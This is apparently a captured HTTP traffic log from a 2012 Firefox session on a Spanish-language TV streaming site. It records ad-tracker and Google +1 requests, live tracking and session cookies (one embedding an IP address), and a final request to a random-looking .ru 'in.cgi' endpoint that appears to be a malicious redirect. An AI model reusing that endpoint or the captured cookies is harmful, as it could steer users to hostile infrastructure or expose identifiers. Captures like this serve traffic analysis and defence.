GET /p?c1=8&c2=7936279&c3=0&cv=2.0&cj=1 HTTP/1.1

Host: b.scorecardresearch.com
GET /p?c1=8&amp;c2=7936279&amp;c3=0&amp;cv=2.0&amp;cj=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
Cookie: UID=427e3f0-195.159.219.8-1352464772; UIDR=1352464772
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 43
Date: Fri, 09 Nov 2012 12:39:33 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /imp?Z=0x0&y=28&S=INSERT%5fSECTION%5fCODE%5fHERE&i=991315&_salt=4141907090&B=10&r=0&SIG=10v3ff0pe;x-cookie=pyuc0cq89chp3&o=3&f=iz HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?Z=0x0&amp;y=28&amp;S=INSERT%5fSECTION%5fCODE%5fHERE&amp;i=991315&amp;_salt=4141907090&amp;B=10&amp;r=0&amp;SIG=10v3ff0pe;x-cookie=pyuc0cq89chp3&amp;o=3&amp;f=iz HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.castamp.com/embed.php?c=lopezdd&amp;tk=NbPNrVie&amp;vwidth=608&amp;vheight=470
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Fri, 09 Nov 2012 12:39:33 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0199.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: BX=clhp0pd89puc3&amp;b=3&amp;s=vm&amp;t=313; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT uid=uid=832d3c0e-2a6a-11e2-bf05-ebe0a596cfad&amp;_hmacv=1&amp;_salt=257071224&amp;_keyid=k1&amp;_hmac=fd7593b8d3b730ee5204243ea08e12727e8019a6; path=/; expires=Sun, 09-Dec-2012 12:39:33 GMT RMBX=clhp0pd89puc3&amp;b=3&amp;s=vm&amp;t=313; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Fri, 09 Nov 2012 12:39:33 GMT
Expires: Fri, 09 Nov 2012 12:39:33 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /pixel/p-70x45KyHA6cIs.gif?media=ad HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Set-Cookie: mc=509cf985-3a17b-ac1d4-cd61b; expires=Sun, 11-May-2014 12:39:33 GMT; path=/; domain=.quantserve.com
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV&quot;
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Fri, 09 Nov 2012 12:39:33 GMT
Server: QS
GET /_/+1/fastbutton?bsv=m&count=1&size=medium&hl=en-US&origin=http%3A%2F%2Fwww.tvnovela.tv&url=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&ic=1&jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DQsxprL00njE.no.%2Fsv%3D1%2Fam%3D!UINAgHOiu5aIzovkDQ%2Fd%3D1%2Frs%3DAItRSTM7EbkTqf6RHV1s2iNY462rZDmvSA HTTP/1.1

Host: plusone.google.com
GET /_/+1/fastbutton?bsv=m&amp;count=1&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Fwww.tvnovela.tv&amp;url=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&amp;ic=1&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DQsxprL00njE.no.%2Fsv%3D1%2Fam%3D!UINAgHOiu5aIzovkDQ%2Fd%3D1%2Frs%3DAItRSTM7EbkTqf6RHV1s2iNY462rZDmvSA HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Fri, 09 Nov 2012 12:39:33 GMT
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
GET /_/apps-static/_/js/gapi/googleapis_client,iframes_styles_bubble_internal/rt=j/ver=QsxprL00njE.no./sv=1/am=!UINAgHOiu5aIzovkDQ/d=1/rs=AItRSTM7EbkTqf6RHV1s2iNY462rZDmvSA/cb=gapi.loaded_0 HTTP/1.1

Host: plusone.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://plusone.google.com/_/+1/fastbutton?bsv=m&amp;count=1&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Fwww.tvnovela.tv&amp;url=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&amp;ic=1&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DQsxprL00njE.no.%2Fsv%3D1%2Fam%3D!UINAgHOiu5aIzovkDQ%2Fd%3D1%2Frs%3DAItRSTM7EbkTqf6RHV1s2iNY462rZDmvSA
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;-1948845099&quot;
Expires: Sat, 08 Dec 2012 01:59:57 GMT
Date: Thu, 08 Nov 2012 01:59:57 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 34154
Age: 124776
GET /pixel.gif?id=3488682 HTTP/1.1

Host: pxses.smowtion.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-cache, no-store, must-revalidate
Content-Encoding: gzip
Date: Fri, 09 Nov 2012 12:39:32 GMT
Last-Modified: Wed, 11 Jul 2012 18:23:37 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 57
Connection: keep-alive
GET /_/apps-static/_/js/plusone/p1b,p1p/rt=j/ver=CsCwSEhHeXA.en_US./sv=1/am=!NBYAyjO5WNGFzTm-5g/d=1/rs=AItRSTMbVd5yMaHxgCL1dCfa9cu_NAkVDg/cb=gapi.loaded_1 HTTP/1.1

Host: plusone.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://plusone.google.com/_/+1/fastbutton?bsv=m&amp;count=1&amp;size=medium&amp;hl=en-US&amp;origin=http%3A%2F%2Fwww.tvnovela.tv&amp;url=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html&amp;ic=1&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DQsxprL00njE.no.%2Fsv%3D1%2Fam%3D!UINAgHOiu5aIzovkDQ%2Fd%3D1%2Frs%3DAItRSTM7EbkTqf6RHV1s2iNY462rZDmvSA
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;-9145374&quot;
Expires: Sat, 08 Dec 2012 00:02:46 GMT
Date: Thu, 08 Nov 2012 00:02:46 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 21182
Age: 131807
GET /favicon.ico HTTP/1.1

Host: www.tvnovela.tv

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/x-icon
Date: Fri, 09 Nov 2012 12:39:33 GMT
Server: Apache
Last-Modified: Sat, 31 Mar 2012 09:48:21 GMT
Accept-Ranges: bytes
Content-Length: 0
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
GET /global-tv-en-vivo.html HTTP/1.1

Host: www.tvnovela.tv

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
X-Moz: prefetch
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Fri, 09 Nov 2012 12:39:33 GMT
Server: Apache
Vary: Accept-Encoding,Cookie,User-Agent
X-Powered-By: W3 Total Cache/0.9.2.4
Content-Encoding: gzip
X-Pingback: http://www.tvnovela.tv/xmlrpc.php
Set-Cookie: w3tc_referrer=http%3A%2F%2Fwww.tvnovela.tv%2Ftelevisa-en-vivo.html; path=/
Last-Modified: Fri, 09 Nov 2012 11:40:02 GMT
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /tvespanolenvivo/playazteca.jpg HTTP/1.1

Host: www.onlinetv.planetfools.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html
HTTP/1.1 403 Forbidden

Content-Type: text/html
Date: Fri, 09 Nov 2012 12:39:27 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.16
Accept-Ranges: bytes
Content-Length: 68729
Connection: close
GET /in.cgi?15 HTTP/1.1

Host: fyprqknpiuspfksq.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tvnovela.tv/televisa-en-vivo.html